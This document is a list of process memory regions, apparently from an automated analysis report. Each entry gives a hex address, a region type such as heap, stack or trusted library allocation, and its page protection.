|
||
2546B789000
|
heap
|
page read and write
|
||
1BA72C50000
|
heap
|
page read and write
|
||
189FDF57000
|
heap
|
page execute and read and write
|
||
1C4D0007000
|
heap
|
page read and write
|
||
1001FF000
|
stack
|
page read and write
|
||
7FF83B9E0000
|
trusted library allocation
|
page read and write
|
||
9FC3CFE000
|
stack
|
page read and write
|
||
1A7C680A000
|
heap
|
page read and write
|
||
955B27E000
|
stack
|
page read and write
|
||
245935CD000
|
heap
|
page read and write
|
||
174D2DB0000
|
heap
|
page read and write
|
||
7FF83BA70000
|
trusted library allocation
|
page read and write
|
||
245935FC000
|
heap
|
page read and write
|
||
1A7C6902000
|
heap
|
page read and write
|
||
139D8AB0000
|
heap
|
page read and write
|
||
7FF83B9F0000
|
trusted library allocation
|
page read and write
|
||
7FF83B7B0000
|
trusted library allocation
|
page read and write
|
||
20811397000
|
trusted library allocation
|
page read and write
|
||
7FF83B9C0000
|
trusted library allocation
|
page read and write
|
||
1AA4F87D000
|
heap
|
page read and write
|
||
2546BBCC000
|
heap
|
page read and write
|
||
B9A5E7F000
|
stack
|
page read and write
|
||
1AA61827000
|
trusted library allocation
|
page read and write
|
||
21790676000
|
trusted library allocation
|
page read and write
|
||
18C004E0000
|
trusted library allocation
|
page read and write
|
||
139D8E05000
|
heap
|
page read and write
|
||
1A8E161D000
|
trusted library allocation
|
page read and write
|
||
7FF83B793000
|
trusted library allocation
|
page execute and read and write
|
||
18C6FE00000
|
trusted library allocation
|
page read and write
|
||
2DB30A2B000
|
heap
|
page read and write
|
||
2DB4A991000
|
heap
|
page read and write
|
||
561773E000
|
stack
|
page read and write
|
||
1C4D04E6000
|
heap
|
page read and write
|
||
B9A5B72000
|
stack
|
page read and write
|
||
2DB30A00000
|
heap
|
page read and write
|
||
2390C7B6000
|
trusted library allocation
|
page read and write
|
||
1C4D07EF000
|
heap
|
page read and write
|
||
18C6FD1E000
|
heap
|
page read and write
|
||
7FF83BA74000
|
trusted library allocation
|
page read and write
|
||
10093E000
|
stack
|
page read and write
|
||
1FBCB560000
|
trusted library allocation
|
page read and write
|
||
1A7C6B96000
|
heap
|
page read and write
|
||
D0157E000
|
stack
|
page read and write
|
||
1C4D0058000
|
heap
|
page read and write
|
||
245939F9000
|
heap
|
page read and write
|
||
2546BC3C000
|
heap
|
page read and write
|
||
2DB426F1000
|
trusted library allocation
|
page read and write
|
||
254699A0000
|
heap
|
page read and write
|
||
1ECEE661000
|
heap
|
page read and write
|
||
1C4D0058000
|
heap
|
page read and write
|
||
204E7CAE000
|
heap
|
page read and write
|
||
1C4D0436000
|
heap
|
page read and write
|
||
1C4CFFE9000
|
heap
|
page read and write
|
||
18C6FE55000
|
heap
|
page read and write
|
||
2546BA46000
|
heap
|
page read and write
|
||
7FF83B794000
|
trusted library allocation
|
page read and write
|
||
1A7C6855000
|
heap
|
page read and write
|
||
18C6FCDE000
|
heap
|
page read and write
|
||
1ECD68E1000
|
trusted library allocation
|
page read and write
|
||
1FBE5433000
|
heap
|
page read and write
|
||
1A7C6837000
|
heap
|
page read and write
|
||
BF538F8000
|
stack
|
page read and write
|
||
2080DE49000
|
heap
|
page read and write
|
||
174D539E000
|
trusted library allocation
|
page read and write
|
||
7FF83BAB0000
|
trusted library allocation
|
page read and write
|
||
1A7C681B000
|
heap
|
page read and write
|
||
21790067000
|
trusted library allocation
|
page read and write
|
||
1A7C6BF5000
|
heap
|
page read and write
|
||
D018BE000
|
stack
|
page read and write
|
||
217A6DED000
|
heap
|
page read and write
|
||
2546BF21000
|
heap
|
page read and write
|
||
2103BD5B000
|
heap
|
page read and write
|
||
18C6FE40000
|
trusted library allocation
|
page read and write
|
||
7FF83B8B0000
|
trusted library allocation
|
page execute and read and write
|
||
2103D706000
|
heap
|
page read and write
|
||
7FF83BB00000
|
trusted library allocation
|
page read and write
|
||
174D4C2C000
|
trusted library allocation
|
page read and write
|
||
2080FCA0000
|
heap
|
page execute and read and write
|
||
1AA51920000
|
trusted library allocation
|
page read and write
|
||
139D8A88000
|
heap
|
page read and write
|
||
7FF83B8C0000
|
trusted library allocation
|
page execute and read and write
|
||
FE1AFB8000
|
stack
|
page read and write
|
||
1FBCB580000
|
trusted library allocation
|
page read and write
|
||
2103F8BB000
|
trusted library allocation
|
page read and write
|
||
1C4D04B2000
|
heap
|
page read and write
|
||
7FF83B980000
|
trusted library allocation
|
page execute and read and write
|
||
217A69AA000
|
heap
|
page read and write
|
||
1C4D0058000
|
heap
|
page read and write
|
||
189FDF60000
|
heap
|
page read and write
|
||
7FF83BA30000
|
trusted library allocation
|
page read and write
|
||
7FF83B9E0000
|
trusted library allocation
|
page read and write
|
||
189FE022000
|
heap
|
page read and write
|
||
24593AB5000
|
heap
|
page read and write
|
||
FE1AEB7000
|
stack
|
page read and write
|
||
7FF83B980000
|
trusted library allocation
|
page execute and read and write
|
||
174E4B3C000
|
trusted library allocation
|
page read and write
|
||
1C4CFFFC000
|
heap
|
page read and write
|
||
18C003DC000
|
trusted library allocation
|
page read and write
|
||
1FBCB2F0000
|
heap
|
page read and write
|
||
1C4CFFDA000
|
heap
|
page read and write
|
||
7FF83BA10000
|
trusted library allocation
|
page read and write
|
||
7FF83BA50000
|
trusted library allocation
|
page read and write
|
||
1A7C6C5F000
|
heap
|
page read and write
|
||
2546B7AF000
|
heap
|
page read and write
|
||
1C4D07C1000
|
heap
|
page read and write
|
||
18C6FDC0000
|
heap
|
page read and write
|
||
1A7C681B000
|
heap
|
page read and write
|
||
2DB32CBA000
|
trusted library allocation
|
page read and write
|
||
7FF83B7EB000
|
trusted library allocation
|
page read and write
|
||
1A8DDC80000
|
heap
|
page readonly
|
||
1ECEE61C000
|
heap
|
page read and write
|
||
20828219000
|
heap
|
page read and write
|
||
2103BD17000
|
heap
|
page read and write
|
||
1A8DDAB0000
|
heap
|
page read and write
|
||
7FF83B94A000
|
trusted library allocation
|
page read and write
|
||
7FF83BAA0000
|
trusted library allocation
|
page read and write
|
||
1AA5191C000
|
trusted library allocation
|
page read and write
|
||
2103DBB1000
|
trusted library allocation
|
page read and write
|
||
2DB42769000
|
trusted library allocation
|
page read and write
|
||
1FBE5480000
|
heap
|
page execute and read and write
|
||
1ECD4417000
|
heap
|
page read and write
|
||
7FF83B79D000
|
trusted library allocation
|
page execute and read and write
|
||
2546B754000
|
heap
|
page read and write
|
||
10057F000
|
stack
|
page read and write
|
||
1C4D080B000
|
heap
|
page read and write
|
||
204E7C95000
|
heap
|
page read and write
|
||
2081FFA3000
|
trusted library allocation
|
page read and write
|
||
139D8A3B000
|
heap
|
page read and write
|
||
18C71C51000
|
heap
|
page read and write
|
||
1BA5AAC2000
|
trusted library allocation
|
page read and write
|
||
7FF83B9A2000
|
trusted library allocation
|
page read and write
|
||
1A7C6A73000
|
heap
|
page read and write
|
||
91B14B9000
|
stack
|
page read and write
|
||
7FF83B932000
|
trusted library allocation
|
page read and write
|
||
204E7C6E000
|
heap
|
page read and write
|
||
2546B795000
|
heap
|
page read and write
|
||
139D8AB0000
|
heap
|
page read and write
|
||
189FBFDF000
|
heap
|
page read and write
|
||
1FBCD3E3000
|
trusted library allocation
|
page read and write
|
||
7FF83B8F0000
|
trusted library allocation
|
page execute and read and write
|
||
5399683000
|
stack
|
page read and write
|
||
174ECDCA000
|
heap
|
page read and write
|
||
1C4CE4C0000
|
heap
|
page read and write
|
||
2DB4A897000
|
heap
|
page read and write
|
||
FE1AE3E000
|
stack
|
page read and write
|
||
2DB326F1000
|
trusted library allocation
|
page read and write
|
||
1A8DD9D0000
|
heap
|
page read and write
|
||
24593609000
|
heap
|
page read and write
|
||
1C4CE1D9000
|
heap
|
page read and write
|
||
24593AAD000
|
heap
|
page read and write
|
||
139D8AAE000
|
heap
|
page read and write
|
||
1C4D084B000
|
heap
|
page read and write
|
||
1A8E123F000
|
trusted library allocation
|
page read and write
|
||
7FF83BA6D000
|
trusted library allocation
|
page read and write
|
||
20827D7D000
|
heap
|
page read and write
|
||
245936E0000
|
remote allocation
|
page read and write
|
||
1A7C6BE1000
|
heap
|
page read and write
|
||
18C0013F000
|
trusted library allocation
|
page read and write
|
||
1C4D07A0000
|
heap
|
page read and write
|
||
1ECD6570000
|
trusted library allocation
|
page read and write
|
||
24593D38000
|
heap
|
page read and write
|
||
139D8A42000
|
heap
|
page read and write
|
||
2546B789000
|
heap
|
page read and write
|
||
7FF83BAF0000
|
trusted library allocation
|
page read and write
|
||
1FBCD3E7000
|
trusted library allocation
|
page read and write
|
||
174D2EDD000
|
heap
|
page read and write
|
||
7FF83BA30000
|
trusted library allocation
|
page read and write
|
||
245935E1000
|
heap
|
page read and write
|
||
1FBCB358000
|
heap
|
page read and write
|
||
21055DAA000
|
heap
|
page read and write
|
||
2546B775000
|
heap
|
page read and write
|
||
1C4D0481000
|
heap
|
page read and write
|
||
7FF83BAF0000
|
trusted library allocation
|
page read and write
|
||
7FF83B846000
|
trusted library allocation
|
page read and write
|
||
1A7C49D0000
|
heap
|
page read and write
|
||
24593A9A000
|
heap
|
page read and write
|
||
1C4D0058000
|
heap
|
page read and write
|
||
23924130000
|
heap
|
page read and write
|
||
217A6B1D000
|
heap
|
page read and write
|
||
7FF83B9E0000
|
trusted library allocation
|
page read and write
|
||
2459361B000
|
heap
|
page read and write
|
||
24591728000
|
heap
|
page read and write
|
||
7FF83B7A0000
|
trusted library allocation
|
page read and write
|
||
7FF83B941000
|
trusted library allocation
|
page read and write
|
||
7FF83B9A0000
|
trusted library allocation
|
page read and write
|
||
20827E60000
|
heap
|
page read and write
|
||
189FE4D0000
|
heap
|
page read and write
|
||
245935CD000
|
heap
|
page read and write
|
||
245919C9000
|
heap
|
page read and write
|
||
1C4D04C6000
|
heap
|
page read and write
|
||
24591725000
|
heap
|
page read and write
|
||
245935DC000
|
heap
|
page read and write
|
||
7FF83BA81000
|
trusted library allocation
|
page read and write
|
||
2DB4A869000
|
heap
|
page read and write
|
||
1C4CFFDB000
|
heap
|
page read and write
|
||
245916EB000
|
heap
|
page read and write
|
||
1C4D04F8000
|
heap
|
page read and write
|
||
1C4D04A8000
|
heap
|
page read and write
|
||
7FF83BA20000
|
trusted library allocation
|
page read and write
|
||
1A8DDB74000
|
heap
|
page read and write
|
||
1C4D083F000
|
heap
|
page read and write
|
||
1C4D04FD000
|
heap
|
page read and write
|
||
2080FD36000
|
trusted library allocation
|
page read and write
|
||
FE1ADF9000
|
stack
|
page read and write
|
||
7FF83B9F0000
|
trusted library allocation
|
page read and write
|
||
7FF83B9F0000
|
trusted library allocation
|
page read and write
|
||
7FF83BAA0000
|
trusted library allocation
|
page read and write
|
||
2546B799000
|
heap
|
page read and write
|
||
7FF83B962000
|
trusted library allocation
|
page read and write
|
||
7FF83B9C0000
|
trusted library allocation
|
page execute and read and write
|
||
9FC3EFC000
|
stack
|
page read and write
|
||
1C4CE206000
|
heap
|
page read and write
|
||
7FF83B870000
|
trusted library allocation
|
page read and write
|
||
2546BB30000
|
remote allocation
|
page read and write
|
||
1AA517EE000
|
trusted library allocation
|
page read and write
|
||
883D40D000
|
stack
|
page read and write
|
||
7FF83B7D2000
|
trusted library allocation
|
page read and write
|
||
1A7C6BF5000
|
heap
|
page read and write
|
||
24593A23000
|
heap
|
page read and write
|
||
1AA6985E000
|
heap
|
page read and write
|
||
24591758000
|
heap
|
page read and write
|
||
24591767000
|
heap
|
page read and write
|
||
1C4D07D1000
|
heap
|
page read and write
|
||
D0193B000
|
stack
|
page read and write
|
||
1A7C6900000
|
heap
|
page read and write
|
||
1BA5AE5E000
|
trusted library allocation
|
page read and write
|
||
1FBCB370000
|
heap
|
page read and write
|
||
1A7C499D000
|
heap
|
page read and write
|
||
1BA58D47000
|
heap
|
page read and write
|
||
7FF83BAF0000
|
trusted library allocation
|
page read and write
|
||
F5095FD000
|
stack
|
page read and write
|
||
254699B0000
|
heap
|
page read and write
|
||
7FF83B94A000
|
trusted library allocation
|
page read and write
|
||
189FC174000
|
heap
|
page read and write
|
||
1AA4FB00000
|
trusted library allocation
|
page read and write
|
||
1C4D02A3000
|
heap
|
page read and write
|
||
1BA58DF0000
|
heap
|
page read and write
|
||
18C00567000
|
trusted library allocation
|
page read and write
|
||
1ECD6AB5000
|
trusted library allocation
|
page read and write
|
||
2DB42701000
|
trusted library allocation
|
page read and write
|
||
1BA72CA2000
|
heap
|
page read and write
|
||
24591706000
|
heap
|
page read and write
|
||
2546BC15000
|
heap
|
page read and write
|
||
24593AAB000
|
heap
|
page read and write
|
||
7FF83B8A6000
|
trusted library allocation
|
page execute and read and write
|
||
2546B789000
|
heap
|
page read and write
|
||
2459179D000
|
heap
|
page read and write
|
||
B9A5F7D000
|
stack
|
page read and write
|
||
204E749B000
|
heap
|
page read and write
|
||
174D2E90000
|
heap
|
page read and write
|
||
7FF83B7DB000
|
trusted library allocation
|
page read and write
|
||
2D4A538000
|
stack
|
page read and write
|
||
24591720000
|
heap
|
page read and write
|
||
24591788000
|
heap
|
page read and write
|
||
1BA5AE9A000
|
trusted library allocation
|
page read and write
|
||
1BA5AB88000
|
trusted library allocation
|
page read and write
|
||
7FF83B81C000
|
trusted library allocation
|
page execute and read and write
|
||
1A8F7A1D000
|
heap
|
page read and write
|
||
2080DE80000
|
heap
|
page read and write
|
||
24591770000
|
heap
|
page read and write
|
||
1C4D04AB000
|
heap
|
page read and write
|
||
1A7C6BF5000
|
heap
|
page read and write
|
||
18C71CF0000
|
heap
|
page execute and read and write
|
||
955B7FE000
|
stack
|
page read and write
|
||
18980040000
|
trusted library allocation
|
page read and write
|
||
2103F5CB000
|
trusted library allocation
|
page read and write
|
||
1A7C6849000
|
heap
|
page read and write
|
||
7FF83B94A000
|
trusted library allocation
|
page read and write
|
||
1A7C6C3B000
|
heap
|
page read and write
|
||
85F3BEF000
|
stack
|
page read and write
|
||
7FF83B970000
|
trusted library allocation
|
page read and write
|
||
1C4D04FE000
|
heap
|
page read and write
|
||
1C4CFFD8000
|
heap
|
page read and write
|
||
9FC3A7E000
|
stack
|
page read and write
|
||
1C4D07DA000
|
heap
|
page read and write
|
||
1EF51BE0000
|
heap
|
page execute and read and write
|
||
18980491000
|
trusted library allocation
|
page read and write
|
||
1C4CFFFF000
|
heap
|
page read and write
|
||
24593A59000
|
heap
|
page read and write
|
||
2390C018000
|
trusted library allocation
|
page read and write
|
||
2080E0E0000
|
trusted library allocation
|
page read and write
|
||
9FC3AFE000
|
stack
|
page read and write
|
||
7FF83B876000
|
trusted library allocation
|
page read and write
|
||
1C4CE226000
|
heap
|
page read and write
|
||
139D8AB2000
|
heap
|
page read and write
|
||
7FF83B8B0000
|
trusted library allocation
|
page execute and read and write
|
||
2390BFCB000
|
trusted library allocation
|
page read and write
|
||
7FF83B8E0000
|
trusted library allocation
|
page execute and read and write
|
||
24593ABE000
|
heap
|
page read and write
|
||
9FC494E000
|
stack
|
page read and write
|
||
BF533EF000
|
stack
|
page read and write
|
||
2546999A000
|
heap
|
page read and write
|
||
2DB32560000
|
trusted library allocation
|
page read and write
|
||
566787E000
|
stack
|
page read and write
|
||
2390C3C5000
|
trusted library allocation
|
page read and write
|
||
2080DEC6000
|
heap
|
page read and write
|
||
7FF83B840000
|
trusted library allocation
|
page read and write
|
||
883C93B000
|
stack
|
page read and write
|
||
139D8A88000
|
heap
|
page read and write
|
||
7FF83B850000
|
trusted library allocation
|
page read and write
|
||
204E74C5000
|
heap
|
page read and write
|
||
7FF83B7C3000
|
trusted library allocation
|
page execute and read and write
|
||
139D8A5E000
|
heap
|
page read and write
|
||
7FF83B7CD000
|
trusted library allocation
|
page execute and read and write
|
||
56171FE000
|
stack
|
page read and write
|
||
1EF69E7E000
|
heap
|
page read and write
|
||
18C6FCC0000
|
heap
|
page read and write
|
||
2103F417000
|
trusted library allocation
|
page read and write
|
||
1A7C49CC000
|
heap
|
page read and write
|
||
24593604000
|
heap
|
page read and write
|
||
1A8E103D000
|
trusted library allocation
|
page read and write
|
||
2103F2B7000
|
trusted library allocation
|
page read and write
|
||
7FF83B7CD000
|
trusted library allocation
|
page execute and read and write
|
||
18980111000
|
trusted library allocation
|
page read and write
|
||
2546BA54000
|
heap
|
page read and write
|
||
23924220000
|
heap
|
page execute and read and write
|
||
7FF83B880000
|
trusted library allocation
|
page read and write
|
||
1A7C680A000
|
heap
|
page read and write
|
||
2546BC3A000
|
heap
|
page read and write
|
||
245919CE000
|
heap
|
page read and write
|
||
1BA5AB8F000
|
trusted library allocation
|
page read and write
|
||
2179EA10000
|
trusted library allocation
|
page read and write
|
||
1C4CE185000
|
heap
|
page read and write
|
||
24593A45000
|
heap
|
page read and write
|
||
2459361B000
|
heap
|
page read and write
|
||
2080DE82000
|
heap
|
page read and write
|
||
1C4D0466000
|
heap
|
page read and write
|
||
7FF83BA70000
|
trusted library allocation
|
page read and write
|
||
1EF53306000
|
trusted library allocation
|
page read and write
|
||
24593A02000
|
heap
|
page read and write
|
||
9FC3502000
|
stack
|
page read and write
|
||
1ECD6461000
|
trusted library allocation
|
page read and write
|
||
24593D1B000
|
heap
|
page read and write
|
||
1BA5A734000
|
heap
|
page read and write
|
||
20827DA6000
|
heap
|
page read and write
|
||
7FF83B8A6000
|
trusted library allocation
|
page execute and read and write
|
||
1ECD5DB0000
|
heap
|
page read and write
|
||
1A7C6826000
|
heap
|
page read and write
|
||
189FC02B000
|
heap
|
page read and write
|
||
1C4D0029000
|
heap
|
page read and write
|
||
1C4D02B5000
|
heap
|
page read and write
|
||
1A8E063D000
|
trusted library allocation
|
page read and write
|
||
2546BC34000
|
heap
|
page read and write
|
||
245938D6000
|
heap
|
page read and write
|
||
2546BC45000
|
heap
|
page read and write
|
||
1FBE5469000
|
heap
|
page read and write
|
||
139D8AAC000
|
heap
|
page read and write
|
||
204E7C71000
|
heap
|
page read and write
|
||
25469890000
|
heap
|
page read and write
|
||
1A7C680A000
|
heap
|
page read and write
|
||
1BA72C47000
|
heap
|
page execute and read and write
|
||
7FF83BA80000
|
trusted library allocation
|
page read and write
|
||
204E748B000
|
heap
|
page read and write
|
||
7FF83BA30000
|
trusted library allocation
|
page read and write
|
||
1A8DDB6D000
|
heap
|
page read and write
|
||
245935F1000
|
heap
|
page read and write
|
||
7FF83B7C7000
|
trusted library allocation
|
page read and write
|
||
189804AC000
|
trusted library allocation
|
page read and write
|
||
1C4CE150000
|
heap
|
page read and write
|
||
204E7A73000
|
heap
|
page read and write
|
||
883C47E000
|
stack
|
page read and write
|
||
1A7C68F0000
|
remote allocation
|
page read and write
|
||
7FF83BB00000
|
trusted library allocation
|
page read and write
|
||
245919CE000
|
heap
|
page read and write
|
||
2459361B000
|
heap
|
page read and write
|
||
2459173C000
|
heap
|
page read and write
|
||
174D51AD000
|
trusted library allocation
|
page read and write
|
||
24593A45000
|
heap
|
page read and write
|
||
24591744000
|
heap
|
page read and write
|
||
1A7C6813000
|
heap
|
page read and write
|
||
7FF83BAB0000
|
trusted library allocation
|
page read and write
|
||
25469917000
|
heap
|
page read and write
|
||
7FF83BA40000
|
trusted library allocation
|
page read and write
|
||
139D8A86000
|
heap
|
page read and write
|
||
1EF4FDAC000
|
heap
|
page read and write
|
||
1A7C48B0000
|
heap
|
page read and write
|
||
7FF83B98A000
|
trusted library allocation
|
page read and write
|
||
2459171E000
|
heap
|
page read and write
|
||
1FBCB4E0000
|
heap
|
page read and write
|
||
2390B9B0000
|
trusted library allocation
|
page read and write
|
||
2546B7B4000
|
heap
|
page read and write
|
||
24591770000
|
heap
|
page read and write
|
||
1A8F7C43000
|
heap
|
page read and write
|
||
18C71C9D000
|
heap
|
page read and write
|
||
1FBE5380000
|
heap
|
page read and write
|
||
7FF83B846000
|
trusted library allocation
|
page read and write
|
||
1A7C6C2D000
|
heap
|
page read and write
|
||
7FF83B972000
|
trusted library allocation
|
page read and write
|
||
2546BA52000
|
heap
|
page read and write
|
||
1A8DF8D0000
|
heap
|
page execute and read and write
|
||
2080F760000
|
trusted library allocation
|
page read and write
|
||
18980536000
|
trusted library allocation
|
page read and write
|
||
7FF83BA30000
|
trusted library allocation
|
page read and write
|
||
1A7C4C90000
|
heap
|
page read and write
|
||
2390BA85000
|
heap
|
page read and write
|
||
7FF83B8E0000
|
trusted library allocation
|
page execute and read and write
|
||
189FBFE8000
|
heap
|
page read and write
|
||
24593A90000
|
heap
|
page read and write
|
||
1FBCDB5A000
|
trusted library allocation
|
page read and write
|
||
1C4D04F2000
|
heap
|
page read and write
|
||
1BA58E40000
|
heap
|
page read and write
|
||
1A7C6855000
|
heap
|
page read and write
|
||
566727E000
|
stack
|
page read and write
|
||
1C4CE1AC000
|
heap
|
page read and write
|
||
1EF5391E000
|
trusted library allocation
|
page read and write
|
||
1FBCB318000
|
heap
|
page read and write
|
||
204E7F86000
|
heap
|
page read and write
|
||
1A7C6A73000
|
heap
|
page read and write
|
||
245917AA000
|
heap
|
page read and write
|
||
1C4D0040000
|
heap
|
page read and write
|
||
1ECD4459000
|
heap
|
page read and write
|
||
10017F000
|
stack
|
page read and write
|
||
7FF83BA90000
|
trusted library allocation
|
page read and write
|
||
2DB4A8F3000
|
heap
|
page read and write
|
||
7FF83B7E0000
|
trusted library allocation
|
page read and write
|
||
139D8AB7000
|
heap
|
page read and write
|
||
1FBCD35A000
|
trusted library allocation
|
page read and write
|
||
1C4D0826000
|
heap
|
page read and write
|
||
174D3025000
|
heap
|
page read and write
|
||
1FBCB5B0000
|
trusted library allocation
|
page read and write
|
||
1FBDD2E0000
|
trusted library allocation
|
page read and write
|
||
2DB32838000
|
trusted library allocation
|
page read and write
|
||
2390C051000
|
trusted library allocation
|
page read and write
|
||
1AA4FB10000
|
heap
|
page read and write
|
||
7FF83B9C0000
|
trusted library allocation
|
page read and write
|
||
7FF83B9A0000
|
trusted library allocation
|
page read and write
|
||
2178E8F0000
|
heap
|
page execute and read and write
|
||
2546BA54000
|
heap
|
page read and write
|
||
25469980000
|
heap
|
page read and write
|
||
2D4A27E000
|
stack
|
page read and write
|
||
7FF83BA90000
|
trusted library allocation
|
page read and write
|
||
204E74AF000
|
heap
|
page read and write
|
||
9FC3DFF000
|
stack
|
page read and write
|
||
2DB32C0E000
|
trusted library allocation
|
page read and write
|
||
20827E40000
|
heap
|
page read and write
|
||
25469971000
|
heap
|
page read and write
|
||
24593D14000
|
heap
|
page read and write
|
||
1BA72C56000
|
heap
|
page read and write
|
||
174D4C25000
|
trusted library allocation
|
page read and write
|
||
2D4A17E000
|
stack
|
page read and write
|
||
174D4C79000
|
trusted library allocation
|
page read and write
|
||
7FF83B8B0000
|
trusted library allocation
|
page execute and read and write
|
||
1BA58D23000
|
heap
|
page read and write
|
||
1C4D041E000
|
heap
|
page read and write
|
||
217A6C20000
|
heap
|
page read and write
|
||
64F5AFB000
|
stack
|
page read and write
|
||
566777E000
|
stack
|
page read and write
|
||
1C4D0481000
|
heap
|
page read and write
|
||
1EF51AA3000
|
trusted library allocation
|
page read and write
|
||
1FBCD331000
|
trusted library allocation
|
page read and write
|
||
1AA4F8CA000
|
heap
|
page read and write
|
||
2546BBC7000
|
heap
|
page read and write
|
||
1AA51D18000
|
trusted library allocation
|
page read and write
|
||
2459377A000
|
heap
|
page read and write
|
||
1C4D07EB000
|
heap
|
page read and write
|
||
1C4D0472000
|
heap
|
page read and write
|
||
24593AB3000
|
heap
|
page read and write
|
||
D017BE000
|
stack
|
page read and write
|
||
2459367F000
|
heap
|
page read and write
|
||
57691FF000
|
stack
|
page read and write
|
||
7FF83BA60000
|
trusted library allocation
|
page read and write
|
||
1C4D02B5000
|
heap
|
page read and write
|
||
174D2DF0000
|
heap
|
page read and write
|
||
24591729000
|
heap
|
page read and write
|
||
7FF7A1780000
|
unkown
|
page readonly
|
||
245916D0000
|
heap
|
page read and write
|
||
1C4D04AF000
|
heap
|
page read and write
|
||
204E749F000
|
heap
|
page read and write
|
||
20827D23000
|
heap
|
page read and write
|
||
1C4D0006000
|
heap
|
page read and write
|
||
174D2F80000
|
heap
|
page read and write
|
||
1AA4F89F000
|
heap
|
page read and write
|
||
1FBE55CD000
|
heap
|
page read and write
|
||
24591690000
|
heap
|
page read and write
|
||
174D4BE3000
|
trusted library allocation
|
page read and write
|
||
1C4CE1B2000
|
heap
|
page read and write
|
||
139D8AB2000
|
heap
|
page read and write
|
||
2390A135000
|
heap
|
page read and write
|
||
1AA51910000
|
trusted library allocation
|
page read and write
|
||
7FF83B9A2000
|
trusted library allocation
|
page read and write
|
||
7FF83BB00000
|
trusted library allocation
|
page read and write
|
||
24593A49000
|
heap
|
page read and write
|
||
174D4B63000
|
trusted library allocation
|
page read and write
|
||
1FBCD88C000
|
trusted library allocation
|
page read and write
|
||
2081137E000
|
trusted library allocation
|
page read and write
|
||
D013FE000
|
stack
|
page read and write
|
||
7FF83B990000
|
trusted library allocation
|
page execute and read and write
|
||
24593A7C000
|
heap
|
page read and write
|
||
7FF83BA60000
|
trusted library allocation
|
page read and write
|
||
18C6FB80000
|
heap
|
page read and write
|
||
1C4CE1CA000
|
heap
|
page read and write
|
||
1AA4F84A000
|
heap
|
page read and write
|
||
7FF83B7FC000
|
trusted library allocation
|
page execute and read and write
|
||
1C4D04D5000
|
heap
|
page read and write
|
||
1A8F7BE6000
|
heap
|
page read and write
|
||
1A7C67F0000
|
heap
|
page read and write
|
||
1EF53922000
|
trusted library allocation
|
page read and write
|
||
1C4D0002000
|
heap
|
page read and write
|
||
189FBFA0000
|
heap
|
page read and write
|
||
1FBDD2D1000
|
trusted library allocation
|
page read and write
|
||
2390C00B000
|
trusted library allocation
|
page read and write
|
||
7FF83B794000
|
trusted library allocation
|
page read and write
|
||
217A6BAE000
|
heap
|
page read and write
|
||
24593A49000
|
heap
|
page read and write
|
||
24593D0F000
|
heap
|
page read and write
|
||
7FF83BAC0000
|
trusted library allocation
|
page read and write
|
||
204E7FA3000
|
heap
|
page read and write
|
||
174D4C54000
|
trusted library allocation
|
page read and write
|
||
18C0005E000
|
trusted library allocation
|
page read and write
|
||
7FF83B880000
|
trusted library allocation
|
page read and write
|
||
1FBE5443000
|
heap
|
page read and write
|
||
7FF83BA40000
|
trusted library allocation
|
page read and write
|
||
139D8C40000
|
remote allocation
|
page read and write
|
||
208281E4000
|
heap
|
page read and write
|
||
7FF83BA50000
|
trusted library allocation
|
page read and write
|
||
1C4CFFDB000
|
heap
|
page read and write
|
||
7FF83BAA0000
|
trusted library allocation
|
page read and write
|
||
1A8F7BBD000
|
heap
|
page read and write
|
||
1C4CE225000
|
heap
|
page read and write
|
||
1A7C6C18000
|
heap
|
page read and write
|
||
2103F2B2000
|
trusted library allocation
|
page read and write
|
||
1C4D086A000
|
heap
|
page read and write
|
||
1EF5332D000
|
trusted library allocation
|
page read and write
|
||
2459178E000
|
heap
|
page read and write
|
||
2546B9C0000
|
heap
|
page read and write
|
||
7FF83BA70000
|
trusted library allocation
|
page read and write
|
||
7FF83BAE0000
|
trusted library allocation
|
page read and write
|
||
245935F8000
|
heap
|
page read and write
|
||
18C71B40000
|
heap
|
page execute and read and write
|
||
7FF83B9A2000
|
trusted library allocation
|
page read and write
|
||
1A7C6F11000
|
heap
|
page read and write
|
||
24593AAC000
|
heap
|
page read and write
|
||
1AA51DE6000
|
trusted library allocation
|
page read and write
|
||
245935E3000
|
heap
|
page read and write
|
||
F5099FB000
|
stack
|
page read and write
|
||
1ECD5F40000
|
heap
|
page read and write
|
||
1005FF000
|
stack
|
page read and write
|
||
91B16BE000
|
stack
|
page read and write
|
||
883C8BE000
|
stack
|
page read and write
|
||
7FF83B886000
|
trusted library allocation
|
page read and write
|
||
204E7C7C000
|
heap
|
page read and write
|
||
7FF83BAE0000
|
trusted library allocation
|
page read and write
|
||
2178CC84000
|
heap
|
page read and write
|
||
139D8AB7000
|
heap
|
page read and write
|
||
204E7F71000
|
heap
|
page read and write
|
||
2546B789000
|
heap
|
page read and write
|
||
1A7C67F3000
|
heap
|
page read and write
|
||
1A8F7EC0000
|
heap
|
page read and write
|
||
25469B10000
|
heap
|
page read and write
|
||
1BA72C40000
|
heap
|
page execute and read and write
|
||
189FE01B000
|
heap
|
page read and write
|
||
1AA4F885000
|
heap
|
page read and write
|
||
189FDF6C000
|
heap
|
page read and write
|
||
91B15BE000
|
stack
|
page read and write
|
||
7FF83B8A6000
|
trusted library allocation
|
page execute and read and write
|
||
7FF83BAC0000
|
trusted library allocation
|
page read and write
|
||
2546BBD3000
|
heap
|
page read and write
|
||
91B1379000
|
stack
|
page read and write
|
||
2546B798000
|
heap
|
page read and write
|
||
7FF83B980000
|
trusted library allocation
|
page execute and read and write
|
||
2546BC50000
|
heap
|
page read and write
|
||
24593774000
|
heap
|
page read and write
|
||
204E7C81000
|
heap
|
page read and write
|
||
BF5336E000
|
stack
|
page read and write
|
||
1BA5AADF000
|
trusted library allocation
|
page read and write
|
||
204E74AB000
|
heap
|
page read and write
|
||
2390A080000
|
heap
|
page read and write
|
||
7FF83B9D0000
|
trusted library allocation
|
page read and write
|
||
1A8DF8D6000
|
heap
|
page execute and read and write
|
||
7FF83B951000
|
trusted library allocation
|
page read and write
|
||
1FBCD428000
|
trusted library allocation
|
page read and write
|
||
7FF83BAE0000
|
trusted library allocation
|
page read and write
|
||
7FF83B9E0000
|
trusted library allocation
|
page read and write
|
||
2390A090000
|
heap
|
page read and write
|
||
1A8DDAD0000
|
heap
|
page read and write
|
||
1C4D0828000
|
heap
|
page read and write
|
||
1ECD45C5000
|
heap
|
page read and write
|
||
7FF83BAF0000
|
trusted library allocation
|
page read and write
|
||
BF5478D000
|
stack
|
page read and write
|
||
2546B76C000
|
heap
|
page read and write
|
||
1A7C4900000
|
heap
|
page read and write
|
||
7FF83BA00000
|
trusted library allocation
|
page read and write
|
||
204E7F7F000
|
heap
|
